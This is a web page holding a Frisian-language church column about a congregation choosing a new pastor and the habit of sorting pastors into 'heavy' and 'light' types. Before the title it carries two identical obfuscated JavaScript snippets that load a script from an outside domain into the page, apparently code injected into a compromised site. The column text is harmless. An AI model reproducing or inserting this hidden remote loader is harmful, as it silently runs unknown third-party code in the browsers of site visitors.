;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); In swiere of in lichte dûmny…….. - PKN Damwâld

In swiere of in lichte dûmny……..

Gepubliceerd op: vrijdag 5 maart 2021

Ús gemeente mat op syk nei in oare dûmny en no mei it tsjerke-folk har hearre litte.  De tsjerkerie hat al ferskillende hokjes foar ús klearset, wêr’t wy de ferskillende “soarten” yn pleatse kin. Sa meie wy kieze út jong of âld(-er), man as frou, liturgisch oanlein, evangelisch en gean sa mar troch.  Foar my is soks in hiele tiizeboel en sa bitocht ik my;  jou ús as foarbyld der wat nammen by, dan wit we wa’t yn welk hokje past.  As wy no dûmny Boukes as foar byld nimme, sykje dêr in hokje by en by Robert Colijn fan’t selfde, dan ha jo in helder byld foar eagen by al dy hokjes.  Wolle jo it byld dan nog wat ferfijne, wat better “ynzoome”, kom dan mei de ideale lengte- of breedte-maat, want lit we earlik wêze, it mat fansels al wat lykje, wat jo alle wiken op de “stoel” ha!  In jier as wat lyn troffen wy, yn Limburg op fekânsje, in man en wy rekken oan de praat, by eintsje bislút oer de dûmny’s.  Se hiene krekt in nije dûmny, in frou sa dy bliken. Ik sei, blinder dat is in stik bûter yn’e brij, hoe liket it?  De man antwurde; de brûk bollet my der net fan. Mis dus, mar hy tocht, sa sei er, yn’e Wâlden bin se wol aardich swier op’e hân. Ik kaam fansels daliks mei foarbylden fan allerhande “lichte” dûmny’s dy’t by ús oer de flier kamen. Ús konklúzje, sykje wat by jo as gemeente past en tink net tefolle yn hokjes!  Ik ha him doe it ferhaal fan Dûmny Sint Wilman, ôfkomstich fan Wierum, fertelt:

De Wierumers bin tige swier op’e hân,  

hja psalmje yn’ tsjerke en preekje op it lân   

mar nei in slokje en in dronken gat   

jouwe hja neat om God en Syn gebot!  

Sietse Hilverda

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns